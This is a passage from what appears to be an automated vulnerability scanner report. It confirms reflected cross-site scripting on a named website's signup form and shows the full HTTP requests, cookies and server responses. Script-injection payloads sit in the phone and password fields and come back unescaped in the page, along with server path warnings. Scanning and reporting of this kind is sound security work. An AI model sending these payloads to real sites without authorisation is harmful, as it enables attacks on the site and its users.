color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> </font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" NAME="valp" VALUE="not_used"> <input type="hidden" N..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST '"--></style></script><script>alert(0x002AC7)</script>
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 329
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title=3&street=3&city=3&state=3&zip=3&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002AC7)%3c%2fscript%3e&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:56:36 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="\'\"--></style></script><script>netsparker(0x002AC7)</script>"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> </font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" NAME="valp" VALUE="not_used"> <input type="hidden" N..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST '"--></style></script><script>alert(0x002BBF)</script>
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
submit POST DONE ...Give me my site!
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idVistor[3]=179011244; idV[20403]=535593943
Content-Length: 361
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002BBF)%3c%2fscript%3e&passwrd2=3&title=3&street=3&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&submit=DONE+...Give+me+my+site!&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:39:26 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><br><b>Warning</b>: OpenDir: No such file or directory (errno 2) in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1102</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1103</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1111</b><br><br><b>Warning</b>: Missing argument 1 for joinpage() in <b>/home/glnorg/public_html/002_Website.php3</b> on line <b>84</b><br><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b><font color="#FF0000">Oops! ...<br>Please check the following (red) entries*</font></b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1"></font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2">